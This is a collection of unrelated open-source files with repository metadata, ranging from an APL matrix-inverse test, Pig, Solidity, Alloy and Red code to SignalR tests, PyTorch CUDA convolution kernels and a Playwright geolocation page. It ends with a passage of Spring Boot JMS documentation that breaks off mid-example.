⍝ Copyright 2016, Martin Elsman ⍝ MIT License ⍝ ⍝ Matrix inverse ⍝ [id n] returns an n×n identity matrix id ← {(⍳⍵)∘.=⍳⍵} else ← {(⍺⍺⍣⍺)(⍵⍵⍣(~⍺))⍵} ⍝ [n swap1 m] swaps row n in m with the first row swap1 ← { n ← ⍺ (n = 1) { ⍵ } else { row ← 1↑(n-1)↓⍵ fst ← 1↑⍵ pre ← 1↓(n-1)↑⍵ suf ← n↓⍵ row ⍪ pre ⍪ fst ⍪ suf } ⍵ } swap ← { x ← ⍺[1] y ← ⍺[2] (x=y) { ⍵ } else { x swap1 (y swap1 (x swap1 ⍵)) } ⍵ } ⍝ [normVec v] normalizes a vector to have a leading 1 (assumes non-zero first element) normVec ← { ⍵ ÷ ⊃ ⍵ } normFirst ← { (normVec 1↑⍵) ⍪ 1↓⍵ } normByPivot ← { v ← ⊃ (⍺-1)↓⍉(⍺-1)↓⍵ ⍝ v ← (⍵[⍺])[⍺] pre ← (⍺-1)↑⍵ rest ← (⍺-1)↓⍵ row ← 1↑rest suf ← 1↓rest pre ⍪ (row ÷ v) ⍪ suf } ⍝ ⎕ ← 'Tests of normByPivot' ⍝ arg ← 1 ⌽ 5 5 ⍴ ⍳ 8 ⍝ ⎕ ← arg ⍝ ⎕ ← 2 normByPivot arg ⍝ [n maxColIdx m] returns the index of the largest element in column n of m maxColIdx ← { c ← ,1↑(⍺-1)↓⍉⍵ m ← ⌈/c ⌈/(⍳⊃⍴⍵)×({⍵=m}¨c) } ⍝ ⎕ ← 'Tests of maxColIdx' ⍝ ⎕ ← 1 maxColIdx 2 ⊖ 3 ⌽ 5 5 ⍴ ⍳ 100 ⍝ => 3 ⍝ ⎕ ← 3 maxColIdx 1 ⊖ 3 ⌽ 5 5 ⍴ ⍳ 100 ⍝ => 4 ⍝ [n maxColIdxSub m] returns the index of the largest element in the ⍝ first column of the lower-right sub-matrix of m (indexed by n) maxColIdxSub ← { ⍺ maxColIdx (⍺-1)↓⍵ } ⍝ ⎕ ← 'Tests of maxColIdxSub' ⍝ ⎕ ← 1 maxColIdxSub 2 ⊖ 3 ⌽ 5 5 ⍴ ⍳ 100 ⍝ => 3 ⍝ ⎕ ← 3 maxColIdxSub 1 ⊖ 3 ⌽ 5 5 ⍴ ⍳ 100 ⍝ => 2 ⍝ ⎕ ← 5 maxColIdxSub 1 ⊖ 3 ⌽ 5 5 ⍴ ⍳ 100 ⍝ => 1 zerofront ← { v ← ,1↑⍉⍵ m ← v ∘.× ,⍺ ⍵ - m } zeroPivot ← { i ← ⍺ pre ← (i-1)↑⍵ rest ← (i-1)↓⍵ suf ← 1↓rest r ← 1↑rest onPart ← { v ← ,1↑(i-1)↓⍉⍵ m ← v ∘.× ,r ⍵ - m } (onPart pre) ⍪ r ⍪ onPart suf } inv ← { n ← ⊃ ⍴ ⍵ R ← ⍵ , id n R ← (1 ((⍴R)[2]) ⍴ 1.0) ⍪ R ⍝ Hack to pass the pivot index around looper ← { R ← ⍵ i ← ⌈ ⊃,R ⍝ Extract pivot index R ← 1↓R ⍝ Extract array m ← i maxColIdxSub R R ← (i,m+i-1) swap R R ← i normByPivot R R ← i zeroPivot R R ← (1 ((⍴R)[2]) ⍴ (i+1.0)) ⍪ R ⍝ Increase pivot index } R ← (looper ⍣ n) R R ← 1↓R ⍝ Extract array ⍉n↓⍉R ⍝ Cut off identity matrix } ⍝ Examples A ← 3 3 ⍴ 1 ⌽ ⍉ ⍳ 9 ⎕ ← A ⎕ ← inv A B ← 2 2 ⍴ 4 7 2 6 ⎕ ← B ⎕ ← inv B ⍝ ⎕ ← inv 4 4 ⍴ 4 0 0 0 0 0 2 0 0 1 2 0 1 0 0 1 0
APL
5
melsman/apltail
tests/inv.apl
[ "MIT" ]
-- Licensed to the Apache Software Foundation (ASF) under one or more -- contributor license agreements. See the NOTICE file distributed with -- this work for additional information regarding copyright ownership. -- The ASF licenses this file to you under the Apache License, Version 2.0 -- (the "License"); you may not use this file except in compliance with -- the License. You may obtain a copy of the License at -- -- http://www.apache.org/licenses/LICENSE-2.0 -- -- Unless required by applicable law or agreed to in writing, software -- distributed under the License is distributed on an "AS IS" BASIS, -- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -- See the License for the specific language governing permissions and -- limitations under the License. --------------------------------------------------------------------- -- Top N Queries. -- Counting how many times a query happened --------------------------------------------------------------------- %DECLARE n 5 data = LOAD '$input' USING PigStorage(' ') AS (query:CHARARRAY, count:INT); queries_group = GROUP data BY query; queries_sum = FOREACH queries_group GENERATE group AS query, SUM(data.count) AS count; queries_ordered = ORDER queries_sum BY count DESC; queries_limit = LIMIT queries_ordered $n; STORE queries_limit INTO '$output'; -- End testPig.pig
PigLatin
4
ieugen/calcite
piglet/src/test/resources/testPig.pig
[ "Apache-2.0" ]
pragma solidity ^0.5.0; contract RevertWithReason { string public id = 'RevertWithReason'; constructor() public { require(false, 'reasonstring'); } }
Solidity
3
wbt/truffle
packages/truffle/test/sources/migrations/error/contracts/RevertWithReason.sol
[ "MIT" ]
module examples/toys/railway /* * A simple model of a railway system. Trains sit on segments of tracks * and segments overlap one another. It shows a that simple gate policy * does not ensure train safety. * * author: Daniel Jackson */ sig Seg {next, overlaps: set Seg} fact {all s: Seg | s in s.overlaps} fact {all s1, s2: Seg | s1 in s2.overlaps => s2 in s1.overlaps} sig Train {} sig GateState {closed: set Seg} sig TrainState {on: Train -> lone Seg, occupied: set Seg} fact {all x: TrainState | x.occupied = {s: Seg | some t: Train | t.(x.on) = s} } pred Safe [x: TrainState] {all s: Seg | lone s.overlaps.~(x.on)} pred MayMove [g: GateState, x: TrainState, ts: set Train] { no ts.(x.on) & g.closed } pred TrainsMove [x, x1: TrainState, ts: set Train] { all t: ts | t.(x1.on) in t.(x.on).next all t: Train - ts | t.(x1.on) = t.(x.on) } pred GatePolicy [g: GateState, x: TrainState] { x.occupied.overlaps.~next in g.closed all s1, s2: Seg | some s1.next.overlaps & s2.next => lone (s1+s2) - g.closed } assert PolicyWorks { all x, x1: TrainState, g: GateState, ts: set Train | {MayMove [g, x, ts] TrainsMove [x, x1, ts] Safe [x] GatePolicy [g, x] } => Safe [x1] } -- has counterexample in scope of 4 check PolicyWorks for 2 Train, 1 GateState, 2 TrainState, 4 Seg expect 1 pred TrainsMoveLegal [x, x1: TrainState, g: GateState, ts: set Train] { TrainsMove [x, x1, ts] MayMove [g, x, ts] GatePolicy [g, x] } run TrainsMoveLegal for 3 expect 1 // DEFINED VARIABLES // Defined variables are uncalled, no-argument functions. // They are helpful for getting good visualization. fun contains [] : TrainState -> Seg -> Train { {state: TrainState, seg: Seg, train: Train | seg = train.(state.on)} }
Alloy
5
haslab/Electrum
electrum/src/main/resources/models/examples/toys/railway.als
[ "MIT" ]
Red/System [ Title: "Description" Author: "Qingtian Xie" File: %case-folding.reds Type: 'library Tabs: 4 Rights: "Copyright (C) 2014-2018 Red Foundation. All rights reserved." License: { Distributed under the Boost Software License, Version 1.0. See https://github.com/red/red/blob/master/BSL-License.txt } ] #include %case-folding-table.reds case-folding: context [ upper-to-lower: declare red-vector! lower-to-upper: declare red-vector! compare-integer: func [ ;-- Compare function return integer! p1 [int-ptr!] p2 [int-ptr!] op [integer!] flags [integer!] return: [integer!] ][ p1/value - p2/value ] init: func [ /local size [integer!] sz [integer!] s [series!] a [integer!] b [integer!] table [int-ptr!] ][ size: size? to-lowercase-table sz: size * (size? integer!) ;-- make upper-to-lower vector! vector/make-at as red-value! upper-to-lower size TYPE_CHAR size? integer! s: GET_BUFFER(upper-to-lower) copy-memory as byte-ptr! s/offset as byte-ptr! to-lowercase-table sz s/tail: as cell! ((as byte-ptr! s/offset) + sz) size: size? to-uppercase-table sz: size * (size? integer!) ;-- make lower-to-upper vector! vector/make-at as red-value! lower-to-upper size TYPE_CHAR size? integer! s: GET_BUFFER(lower-to-upper) copy-memory as byte-ptr! s/offset as byte-ptr! to-uppercase-table sz s/tail: as cell! ((as byte-ptr! s/offset) + sz) ] change-char: func [ cp [integer!] upper? [logic!] return: [integer!] /local c [integer!] last [integer!] end [integer!] table [int-ptr!] vec [red-vector!] s [series!] ][ vec: either upper? [lower-to-upper][upper-to-lower] s: GET_BUFFER(vec) table: as int-ptr! s/offset last: vector/rs-length? vec end: last - 1 unless any [cp < table/1 cp > table/last][ c: -1 until [ c: c + 2 if table/c > cp [return cp] if table/c = cp [ c: c + 1 return table/c ] c = end ] ] cp ] change: func [ arg [red-value!] part [integer!] upper? [logic!] return: [red-value!] /local limit [red-value!] int [red-integer!] char [red-char!] str [red-string!] str2 [red-string!] w [red-word!] unit [integer!] unit2 [integer!] s [series!] p [byte-ptr!] p4 [int-ptr!] cp [integer!] len [integer!] i [integer!] ][ either TYPE_OF(arg) = TYPE_CHAR [ char: as red-char! arg char/value: change-char char/value upper? ][ str: as red-string! arg s: GET_BUFFER(str) unit: GET_UNIT(s) p: (as byte-ptr! s/offset) + (str/head << (log-b unit)) len: (as-integer s/tail - (as red-value! p)) >> (log-b unit) if positive? part [ limit: arg + part len: either TYPE_OF(limit) = TYPE_INTEGER [ int: as red-integer! limit int/value ][ str2: as red-string! limit unless all [ TYPE_OF(str2) = TYPE_OF(str) ;-- handles ANY-STRING! str2/node = str/node ][ ERR_INVALID_REFINEMENT_ARG(refinements/_part limit) ] str2/head - str/head ] if negative? len [len: 0] ] i: 0 while [i < len][ cp: switch unit [ Latin1 [as-integer p/value] UCS-2 [(as-integer p/2) << 8 + p/1] UCS-4 [p4: as int-ptr! p p4/value] ] s: string/poke-char s p change-char cp upper? unit2: GET_UNIT(s) if unit2 > unit [ unit: unit2 p: (as byte-ptr! s/offset) + (str/head + i << (log-b unit)) ] i: i + 1 p: p + unit ] w: either upper? [words/_uppercase][words/_lowercase] ownership/check as red-value! str w null str/head len ] arg ] ]
Red
5
GalenIvanov/red
runtime/case-folding.reds
[ "BSL-1.0", "BSD-3-Clause" ]
# Build configurations for TensorRT. def if_tensorrt(if_true, if_false=[]): """Tests whether TensorRT was enabled during the configure process.""" return %{if_tensorrt}
Smarty
1
abhaikollara/tensorflow
third_party/tensorrt/build_defs.bzl.tpl
[ "Apache-2.0" ]
answer = .12345 neganswer = -.12345
TOML
0
vanillajonathan/julia
stdlib/TOML/test/testfiles/invalid/float-no-leading-zero.toml
[ "Zlib" ]
// Licensed to the .NET Foundation under one or more agreements. // The .NET Foundation licenses this file to you under the MIT license. using System; using System.Buffers; using System.Text; using Microsoft.AspNetCore.Internal; using Xunit; namespace Microsoft.AspNetCore.SignalR.Common.Tests.Internal.Formatters { public class TextMessageParserTests { [Fact] public void ReadMessage() { var message = new ReadOnlySequence<byte>(Encoding.UTF8.GetBytes("ABC\u001e")); Assert.True(TextMessageParser.TryParseMessage(ref message, out var payload)); Assert.Equal("ABC", Encoding.UTF8.GetString(payload.ToArray())); Assert.False(TextMessageParser.TryParseMessage(ref message, out payload)); } [Fact] public void TryReadingIncompleteMessage() { var message = new ReadOnlySequence<byte>(Encoding.UTF8.GetBytes("ABC")); Assert.False(TextMessageParser.TryParseMessage(ref message, out var payload)); } [Fact] public void TryReadingMultipleMessages() { var message = new ReadOnlySequence<byte>(Encoding.UTF8.GetBytes("ABC\u001eXYZ\u001e")); Assert.True(TextMessageParser.TryParseMessage(ref message, out var payload)); Assert.Equal("ABC", Encoding.UTF8.GetString(payload.ToArray())); Assert.True(TextMessageParser.TryParseMessage(ref message, out payload)); Assert.Equal("XYZ", Encoding.UTF8.GetString(payload.ToArray())); } [Fact] public void IncompleteTrailingMessage() { var message = new ReadOnlySequence<byte>(Encoding.UTF8.GetBytes("ABC\u001eXYZ\u001e123")); Assert.True(TextMessageParser.TryParseMessage(ref message, out var payload)); Assert.Equal("ABC", Encoding.UTF8.GetString(payload.ToArray())); Assert.True(TextMessageParser.TryParseMessage(ref message, out payload)); Assert.Equal("XYZ", Encoding.UTF8.GetString(payload.ToArray())); Assert.False(TextMessageParser.TryParseMessage(ref message, out payload)); } } }
C#
4
tomaswesterlund/aspnetcore
src/SignalR/common/SignalR.Common/test/Internal/Formatters/TextMessageParserTests.cs
[ "MIT" ]
#!/bin/bash set -e source $(dirname $0)/common.sh repository=$(pwd)/distribution-repository pushd git-repo > /dev/null if [[ -d /opt/openjdk-toolchain ]]; then ./gradlew -Dorg.gradle.internal.launcher.welcomeMessageEnabled=false --no-daemon --max-workers=4 -PdeploymentRepository=${repository} build publishAllPublicationsToDeploymentRepository -PtoolchainVersion=${TOOLCHAIN_JAVA_VERSION} -Porg.gradle.java.installations.auto-detect=false -Porg.gradle.java.installations.auto-download=false -Porg.gradle.java.installations.paths=/opt/openjdk-toolchain/ else ./gradlew -Dorg.gradle.internal.launcher.welcomeMessageEnabled=false --no-daemon --max-workers=4 -PdeploymentRepository=${repository} build publishAllPublicationsToDeploymentRepository fi popd > /dev/null
Shell
3
techAi007/spring-boot
ci/scripts/build-project.sh
[ "Apache-2.0" ]
(ns hu.lib.macros (:require [hu.lib.function :refer [curry compose]] [hu.lib.type :refer [string? array? number? undef? object?]])) (defmacro str? [x expr] `(if (string? ~x) ~expr ~x)) (defmacro arr? [x expr] `(if (array? ~x) ~expr ~x)) (defmacro obj? [x expr] `(if (object? ~x) ~expr ~x)) (defmacro num? [x expr] `(if (number? ~x) ~expr ~x)) (defmacro ? [x y] `(identical? ~x ~y)) (defmacro not? [x y] `(if (? ~x ~y) false true)) (defmacro def? [x] `(if (undef? ~x) false true)) (defmacro unless [condition form] (list 'if condition nil form)) (defmacro when [condition form eform] (list 'if condition form eform)) (defmacro defcurry [name & etc] (let [doc? (string? (first etc)) doc (if doc? (first etc) " ") body (if doc? (rest etc) etc)] `(defn ~name ~doc [& args] (apply (curry (fn ~@body)) args)))) (defmacro defcompose [name & etc] (let [doc? (string? (first etc)) doc (if doc? (first etc) " ") body (if doc? (rest etc) etc)] `(defn ~name ~doc [& args] (apply (compose (fn args) args)))))
wisp
5
h2non/hu
src/macros.wisp
[ "MIT" ]
#include <ATen/ATen.h> #include <ATen/div_rtn.h> #include <ATen/AccumulateType.h> #include <ATen/cuda/CUDABlas.h> #include <ATen/native/ConvUtils.h> #include <ATen/native/Resize.h> #include <ATen/native/cuda/im2col.cuh> namespace at { namespace native { namespace { void slow_conv2d_shape_check( const Tensor& input, const Tensor& grad_output, const Tensor& weight, const Tensor& bias, int64_t kH, int64_t kW, int64_t dH, int64_t dW, int64_t padH, int64_t padW, bool weight_nullable) { TORCH_CHECK(kW > 0 && kH > 0, "kernel size should be greater than zero, but got kH: ", kH, " kW: ", kW); TORCH_CHECK(dW > 0 && dH > 0, "stride should be greater than zero, but got dH: ", dH, " dW: ", dW); TORCH_CHECK(weight_nullable || weight.defined(), "weight tensor is expected to be non-nullable"); TORCH_CHECK(!weight.defined() || ((weight.numel() > 0) && (weight.dim() == 2)), "non-empty 2D weight tensor expected, but got: ", weight.sizes()); TORCH_CHECK(!bias.defined() || (bias.dim() == 1 && bias.sizes()[0] == weight.sizes()[0]), "Expected bias to have shape [", weight.sizes()[0], "] but got ", bias.sizes()); const auto in_sizes = input.sizes(); constexpr int ndim = 4; constexpr int dimf = 1; constexpr int dimh = 2; constexpr int dimw = 3; TORCH_CHECK(in_sizes.size() == ndim, "Expected 4D input tensor, but got ", in_sizes); // Allow for empty batch size but not other dimensions const bool valid_empty = c10::multiply_integers(in_sizes.slice(1)) != 0; TORCH_CHECK(valid_empty, "non-empty input tensor expected but got: ", in_sizes); int64_t inputHeight = in_sizes[dimh]; int64_t inputWidth = in_sizes[dimw]; int64_t exactInputHeight = inputHeight + 2 * padH; int64_t exactInputWidth = inputWidth + 2 * padW; TORCH_CHECK(exactInputHeight >= kH && exactInputWidth >= kW, "Calculated padded input size per channel: ", IntArrayRef{exactInputHeight, exactInputWidth}, ". Kernel size: ", IntArrayRef{kH, kW}, ". Kernel size can't be greater than actual input size"); // NOTE: can't use conv_output_size if the weight isn't defined auto outputHeight = div_rtn<int64_t>(exactInputHeight - kH, dH) + 1; auto outputWidth = div_rtn<int64_t>(exactInputWidth - kW, dW) + 1; TORCH_CHECK(outputWidth >= 1 && outputHeight >= 1, "Given input size per channel: ", IntArrayRef{inputHeight, inputWidth}, ". Calculated output size per channel: ", IntArrayRef{outputHeight, outputWidth}, ". Output size is too small"); if (weight.defined()) { const auto w_sizes = weight.sizes(); int64_t nInputPlane = w_sizes[1]; if (w_sizes.size() == 2) { nInputPlane /= (kH * kW); } TORCH_CHECK(in_sizes[dimf] == nInputPlane, "Expected input dim ", dimf, " to have size ", nInputPlane, " but got ", in_sizes[dimf]); } if (grad_output.defined()) { const auto gO_sizes = grad_output.sizes(); TORCH_CHECK(gO_sizes.size() == ndim, "Expected grad_output to have ", ndim, " dimensions but got shape", gO_sizes); if (weight.defined()) { const auto w_sizes = weight.sizes(); TORCH_CHECK(gO_sizes[dimf] == w_sizes[0], "Expected dim ", dimf, " to have size ", w_sizes[0], " but got ", gO_sizes[dimf]); } else if (bias.defined()) { const auto b_sizes = bias.sizes(); int64_t nOutputPlane = b_sizes.size() == 0 ? 1 : b_sizes[0]; TORCH_CHECK(gO_sizes[dimf] == nOutputPlane, "Expected grad_output dim ", dimf, " to have size ", nOutputPlane, " but got ", gO_sizes[dimf]); } TORCH_CHECK(gO_sizes[dimh] == outputHeight, "Expected grad_output dim ", dimh, " to have size ", outputHeight, " but got ", gO_sizes[dimh]); TORCH_CHECK(gO_sizes[dimw] == outputWidth, "Expected grad_output dim ", dimw, " to have size ", outputWidth, " but got ", gO_sizes[dimw]); } } Tensor new_view_weight_MM2d(const Tensor& weight_) { auto weight = weight_.expect_contiguous(); const auto w_sizes = weight->sizes(); TORCH_CHECK(w_sizes.size() == 4); int64_t s1 = w_sizes[0]; int64_t s2 = c10::multiply_integers(w_sizes.slice(1)); return weight->view({s1, s2}); } void slow_conv2d_forward( const Tensor &input, const Tensor &output, const Tensor &weight_, const Tensor &bias, const Tensor &columns, int64_t kH, int64_t kW, int64_t dH, int64_t dW, int64_t padH, int64_t padW) { auto weight = new_view_weight_MM2d(weight_); slow_conv2d_shape_check( input, {}, weight, bias, kH, kW, dH, dW, padH, padW, /*weight_nullable*/false); constexpr int ndim = 4; constexpr int dimf = 1; constexpr int dimh = 2; constexpr int dimw = 3; auto in_sizes = input.sizes(); int64_t batchSize = in_sizes[0]; int64_t nInputPlane = in_sizes[dimf]; int64_t inputHeight = in_sizes[dimh]; int64_t inputWidth = in_sizes[dimw]; int64_t nOutputPlane = weight.sizes()[0]; int64_t outputHeight = (inputHeight + 2*padH - kH) / dH + 1; int64_t outputWidth = (inputWidth + 2*padW - kW) / dW + 1; // Resize output resize_output(output, {batchSize, nOutputPlane, outputHeight, outputWidth}); // Resize temporary columns resize_output(columns, {nInputPlane * kW * kH, outputHeight * outputWidth}); const bool requires_columns = ( kW != 1 || kH != 1 || dW != 1 || dH != 1 || padH != 0 || padW != 0); if (bias.defined()) { TORCH_CHECK(bias.scalar_type() == input.scalar_type(), "Expected bias to have type ", input.scalar_type(), " but got ", bias.scalar_type()); output.copy_(bias.view({-1, 1, 1})); } else { output.zero_(); } AT_DISPATCH_FLOATING_TYPES_AND2(kHalf, kBFloat16, input.scalar_type(), "slow_conv2d_cuda", [&] { // For each elt in batch, do: for (int elt = 0; elt < batchSize; elt ++) { // Matrix mulitply per output: auto input_n = input.select(0, elt); auto output_n = output.select(0, elt); if (requires_columns) { // Extract columns: at::native::im2col( c10::cuda::getCurrentCUDAStream(), input_n.data_ptr<scalar_t>(), nInputPlane, inputHeight, inputWidth, outputHeight, outputWidth, kH, kW, padH, padW, dH, dW, 1, 1, columns.data_ptr<scalar_t>() ); } // M,N,K are dims of matrix A and B // (see http://docs.nvidia.com/cuda/cublas/#cublas-lt-t-gt-gemm) int64_t m = nOutputPlane; int64_t n = columns.size(1); int64_t k = nInputPlane*kH*kW; // Do GEMM (note: this is a bit confusing because gemm assumes column-major matrices) auto gemm_in_ptr = requires_columns ? columns.data_ptr<scalar_t>() : input_n.data_ptr<scalar_t>(); at::cuda::blas::gemm( 'n', 'n', n, m, k, scalar_t(1), gemm_in_ptr, n, weight.data_ptr<scalar_t>(), k, scalar_t(1), output_n.data_ptr<scalar_t>(), n ); } }); } void slow_conv2d_backward( const Tensor &input, const Tensor &grad_output, const Tensor &grad_input, const Tensor &weight_, const Tensor &grad_columns, int kH, int kW, int dH, int dW, int padH, int padW) { Tensor weight = new_view_weight_MM2d(weight_); slow_conv2d_shape_check(input, grad_output, weight, {}, kH, kW, dH, dW, padH, padW, /*weight_nullable=*/false); // Params auto weight_sizes = weight.sizes(); int nInputPlane = weight_sizes[1]/(kW*kH); int nOutputPlane = weight_sizes[0]; TORCH_INTERNAL_ASSERT(grad_output.is_contiguous()); auto input_sizes = input.sizes(); int64_t inputWidth = input_sizes[3]; int64_t inputHeight = input_sizes[2]; auto output_sizes = grad_output.sizes(); int64_t outputWidth = output_sizes[3]; int64_t outputHeight = output_sizes[2]; // Batch size + input planes int64_t batchSize = input_sizes[0]; // Resize output resize_output(grad_input, input_sizes); TORCH_CHECK(grad_input.is_contiguous(), "grad_input must be contiguous"); // Resize temporary columns resize_output(grad_columns, {nInputPlane*kW*kH, outputHeight*outputWidth}); TORCH_CHECK(grad_columns.is_contiguous(), "grad_columns must be contiguous"); AT_DISPATCH_FLOATING_TYPES_AND2(kHalf, kBFloat16, input.scalar_type(), "slow_conv2d_backward_cuda", [&] { // For each elt in batch, do: for (int elt = 0; elt < batchSize; elt ++) { // Matrix mulitply per sample: auto grad_input_n = grad_input.select(0, elt); auto grad_output_n = grad_output.select(0, elt); // M,N,K are dims of matrix A and B // (see http://docs.nvidia.com/cuda/cublas/#cublas-lt-t-gt-gemm) int64_t m = nInputPlane*kW*kH; int64_t n = grad_columns.sizes()[1]; int64_t k = nOutputPlane; // Do GEMM (note: this is a bit confusing because gemm assumes column-major matrices) at::cuda::blas::gemm<scalar_t>( 'n', 't', n, m, k, scalar_t(1), grad_output_n.data_ptr<scalar_t>(), n, weight.data_ptr<scalar_t>(), m, scalar_t(0), grad_columns.data_ptr<scalar_t>(), n ); // Unpack columns back into input: using acc_t = at::acc_type<scalar_t, true>; at::native::col2im<scalar_t, acc_t>( c10::cuda::getCurrentCUDAStream(), grad_columns.data_ptr<scalar_t>(), nInputPlane, inputHeight, inputWidth, outputHeight, outputWidth, kH, kW, padH, padW, dH, dW, 1, 1, grad_input_n.data_ptr<scalar_t>() ); } }); } void slow_conv2d_grad_weight( const Tensor &input, const Tensor &grad_output, const Tensor &grad_weight_, const Tensor &columns, int64_t kH, int64_t kW, int64_t dH, int64_t dW, int64_t padH, int64_t padW) { TORCH_CHECK(grad_weight_.is_contiguous(), "grad_weight needs to be contiguous"); auto grad_weight = new_view_weight_MM2d(grad_weight_); slow_conv2d_shape_check(input, grad_output, grad_weight, {}, kH, kW, dH, dW, padH, padW, /*weight_nullable=*/true); // Params TORCH_INTERNAL_ASSERT(input.is_contiguous()); TORCH_INTERNAL_ASSERT(grad_output.is_contiguous()); auto input_sizes = input.sizes(); int64_t nInputPlane = input_sizes[1]; int64_t nOutputPlane = grad_output.sizes()[1]; int64_t inputWidth = input_sizes[3]; int64_t inputHeight = input_sizes[2]; int64_t outputWidth = (inputWidth + 2*padW - kW) / dW + 1; int64_t outputHeight = (inputHeight + 2*padH - kH) / dH + 1; // Batch size + input planes int64_t batchSize = input_sizes[0]; // Resize temporary columns resize_output(columns, {nInputPlane * kH * kW, outputHeight * outputWidth}); const bool requires_columns = ( kW != 1 || kH != 1 || dW != 1 || dH != 1 || padH != 0 || padW != 0); AT_DISPATCH_FLOATING_TYPES_AND2(kHalf, kBFloat16, input.scalar_type(), "slow_conv2d_grad_weight_cuda", [&] { // For each elt in batch, do: for (int elt = 0; elt < batchSize; elt ++) { // Matrix mulitply per output: auto grad_output_n = grad_output.select(0, elt); // Matrix mulitply per output: auto input_n = input.select(0, elt); if (requires_columns) { // Extract columns: at::native::im2col<scalar_t>( c10::cuda::getCurrentCUDAStream(), input_n.data_ptr<scalar_t>(), nInputPlane, inputHeight, inputWidth, outputHeight, outputWidth, kH, kW, padH, padW, dH, dW, 1, 1, columns.data_ptr<scalar_t>() ); } // M,N,K are dims of matrix A and B // (see http://docs.nvidia.com/cuda/cublas/#cublas-lt-t-gt-gemm) int64_t m = nOutputPlane; int64_t n = nInputPlane*kW*kH; int64_t k = columns.sizes()[1]; // Do GEMM (note: this is a bit confusing because gemm assumes column-major matrices) auto gemm_in_ptr = requires_columns ? columns.data_ptr<scalar_t>() : input_n.data_ptr<scalar_t>(); at::cuda::blas::gemm( 't', 'n', n, m, k, scalar_t(1), gemm_in_ptr, k, grad_output_n.data_ptr<scalar_t>(), k, scalar_t(1), grad_weight.data_ptr<scalar_t>(), n ); } }); } } // namespace (anonymous) std::tuple<Tensor&, Tensor&> slow_conv2d_forward_out_cuda( const Tensor &self_, const Tensor &weight_, IntArrayRef kernel_size, const c10::optional<Tensor> &bias_, IntArrayRef stride, IntArrayRef padding, Tensor &output, Tensor &finput) { TORCH_CHECK(kernel_size.size() == 2); TORCH_CHECK(stride.size() == 2); TORCH_CHECK(padding.size() == 2); auto self = self_.expect_contiguous(); auto weight = weight_.expect_contiguous(); auto bias = [&] { if (bias_.has_value() && bias_->defined()) { return bias_->expect_contiguous(); } return MaybeOwned<Tensor>::owned(c10::in_place); }(); slow_conv2d_forward( *self, output, *weight, *bias, finput, kernel_size[0], kernel_size[1], stride[0], stride[1], padding[0], padding[1] ); return std::tuple<Tensor&, Tensor&>{output, finput}; } std::tuple<Tensor, Tensor> slow_conv2d_forward_cuda( const Tensor &self, const Tensor &weight, IntArrayRef kernel_size, const c10::optional<Tensor> &bias, IntArrayRef stride, IntArrayRef padding) { auto output = at::empty({0}, self.options()); auto finput = at::empty({0}, self.options()); return slow_conv2d_forward_out_cuda( self, weight, kernel_size, bias, stride, padding, output, finput); } std::tuple<Tensor&, Tensor&, Tensor&> slow_conv2d_backward_out_cuda( const Tensor& grad_output_, const Tensor& self_, const Tensor& weight_, IntArrayRef kernel_size, IntArrayRef stride, IntArrayRef padding, const Tensor& finput, Tensor& grad_input, Tensor& grad_weight, Tensor& grad_bias) { auto grad_output = grad_output_.expect_contiguous(); if (grad_input.defined()) { resize_output(grad_input, self_.sizes()); auto weight = weight_.expect_contiguous(); slow_conv2d_backward( self_, *grad_output, grad_input, *weight, finput, kernel_size[0], kernel_size[1], stride[0], stride[1], padding[0], padding[1]); } if (grad_bias.defined()) { at::sum_out(grad_bias, *grad_output, IntArrayRef{0, 2, 3}); } if (grad_weight.defined()) { resize_output(grad_weight, weight_.sizes()); grad_weight.zero_(); auto self = self_.expect_contiguous(); slow_conv2d_grad_weight( *self, *grad_output, grad_weight, finput, kernel_size[0], kernel_size[1], stride[0], stride[1], padding[0], padding[1] ); } return std::tuple<Tensor&, Tensor&, Tensor&>{ grad_input, grad_weight, grad_bias}; } std::tuple<Tensor, Tensor, Tensor> slow_conv2d_backward_cuda( const Tensor& grad_output, const Tensor& self, const Tensor& weight, IntArrayRef kernel_size, IntArrayRef stride, IntArrayRef padding, const Tensor& finput, std::array<bool, 3> output_mask) { Tensor grad_input; Tensor grad_weight; Tensor grad_bias; if (output_mask[0]) { grad_input = at::empty({0}, grad_output.options()); } if (output_mask[1]) { grad_weight = at::empty({0}, grad_output.options()); } if (output_mask[2]) { grad_bias = at::empty({0}, grad_output.options()); } return native::slow_conv2d_backward_out_cuda( grad_output, self, weight, kernel_size, stride, padding, finput, grad_input, grad_weight, grad_bias); } } // namespace native } // namespace at
Cuda
4
xiaohanhuang/pytorch
aten/src/ATen/native/cuda/ConvolutionMM2d.cu
[ "Intel" ]
<script> window.geolocationPromise = new Promise(resolve => { navigator.geolocation.getCurrentPosition(position => { resolve({latitude: position.coords.latitude, longitude: position.coords.longitude}); }); }); </script>
HTML
3
NareshMurthy/playwright
test/assets/geolocation.html
[ "Apache-2.0" ]
i 00001 17 24 02000 00 042 0017 i 00002 00 012 2003 00 040 0016 i 00003 01 24 00011 02 24 00022 i 00004 03 24 00033 00 042 0001 i 00005 00 043 0002 00 043 0003 i 00006 00 043 0000 16 045 0017 i 00007 17 25 77776 17 35 00016 i 00010 00 010 2000 00 012 2004 i 00011 00 27 00016 00 010 2001 i 00012 00 012 2005 00 27 00016 i 00013 00 010 2002 00 012 2006 i 00014 00 27 00016 00 22 00000 i 00015 06 33 12345 00 22 00000 i 00016 02 33 76543 00 22 00000 d 02003 0000 0000 0007 7777 d 02004 0000 0000 0000 0011 d 02005 0000 0000 0000 0022 d 02006 0000 0000 0000 0033
Octave
1
besm6/mesm6
test/its/its.oct
[ "MIT" ]
[[messaging.jms]] == JMS The `javax.jms.ConnectionFactory` interface provides a standard method of creating a `javax.jms.Connection` for interacting with a JMS broker. Although Spring needs a `ConnectionFactory` to work with JMS, you generally need not use it directly yourself and can instead rely on higher level messaging abstractions. (See the {spring-framework-docs}/integration.html#jms[relevant section] of the Spring Framework reference documentation for details.) Spring Boot also auto-configures the necessary infrastructure to send and receive messages. [[messaging.jms.jndi]] === Using a JNDI ConnectionFactory If you are running your application in an application server, Spring Boot tries to locate a JMS `ConnectionFactory` by using JNDI. By default, the `java:/JmsXA` and `java:/XAConnectionFactory` location are checked. You can use the configprop:spring.jms.jndi-name[] property if you need to specify an alternative location, as shown in the following example: [source,yaml,indent=0,subs="verbatim",configprops,configblocks] ---- spring: jms: jndi-name: "java:/MyConnectionFactory" ---- [[messaging.jms.sending]] === Sending a Message Spring's `JmsTemplate` is auto-configured, and you can autowire it directly into your own beans, as shown in the following example: [source,java,indent=0,subs="verbatim"] ---- 